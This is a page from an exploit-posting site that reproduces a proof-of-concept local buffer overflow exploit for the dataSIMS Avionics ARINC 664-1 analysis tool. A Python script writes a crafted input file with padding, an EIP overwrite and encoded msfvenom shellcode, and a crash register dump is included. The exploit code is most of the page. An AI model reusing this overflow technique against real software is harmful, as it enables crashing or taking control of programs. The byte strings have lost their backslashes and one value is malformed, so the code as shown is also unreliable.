dataSIMS Avionics ARINC 664-1 – Local Buffer Overflow (PoC) – Digitalmunition




Exploit/Advisories spider-orange.png

Published on February 19th, 2021 📆 | 8286 Views ⚑

0

dataSIMS Avionics ARINC 664-1 – Local Buffer Overflow (PoC)

# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author:  Kağan Çapar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# about Sofware: 
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# about ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. 
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import struct
import binascii
import os
import sys

#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330     ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!

file = open("milstd1553result.txt", "w")
junk = "x41" * 600
align = "x32" * 4 + "x31" * 4
prop = "x43" * 380
imp = "x62x7ax68x72x74x75x72x6cx75x32"
imp2 = "x61x72x61x63x61x67x131x7a"

#EIP Overwrite junk value
overwrite = "x42" * 4

#Payload size: 29 bytes
#Final size of py file: 160 bytes

#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf =  b""
buf += b"xdaxc1xd9x74x24xf4x58xbbx0bx7ex97x62x33"
buf += b"xc9xb1x01x31x58x19x83xe8xfcx03x58x15xe9"
buf += b"x8bx7cx9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print len(win32)
file.write(win32)
file.close()
            

Source link

Tagged with:



Leave a Reply